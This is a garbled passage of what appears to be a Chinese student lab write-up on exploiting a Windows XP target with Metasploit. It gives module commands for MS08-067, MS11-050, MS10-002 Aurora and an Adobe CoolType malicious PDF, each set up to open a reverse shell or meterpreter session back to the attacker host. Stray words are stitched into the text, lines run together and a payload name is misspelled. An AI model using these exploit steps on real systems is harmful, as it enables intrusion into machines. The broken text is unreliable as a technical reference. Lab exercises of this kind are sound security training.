use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcptcp反向回连 set LHOST 192.168.124.132 set LPORT 5330 端口 set RHOST 192.168.124.135 set target 0
exploit
。成功了,使用systeminfo
查看靶机信息。
html
use windows/browser/ms11_050_mshtml_cobjectelement
使用该模块set payload windows/meterpreter/reverese_http
,并设置相应参数,打开服务exploit,发起渗透攻击。http://192.168.124.132:8080/ms5330
;而后参考组长的博客,将攻击的目标漏洞换成了MS10_002_aurora
。shell
http://192.168.124.132:8080/aurora.html
;sysinfo
查看靶机信息靶机ip地址
windows
windows/fileformat/adobe_cooltype_sing
模块设定相关系数并生成相关文件5330.pdf
在靶机中关闭PDF文档后,攻击机与靶机断开链接。
api
show auxiliary
查看全部辅助模块show options
查看须要设置的消息使用命令run开启扫描,结果以下:
浏览器
此次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感觉到了msf工具功能的强大。安全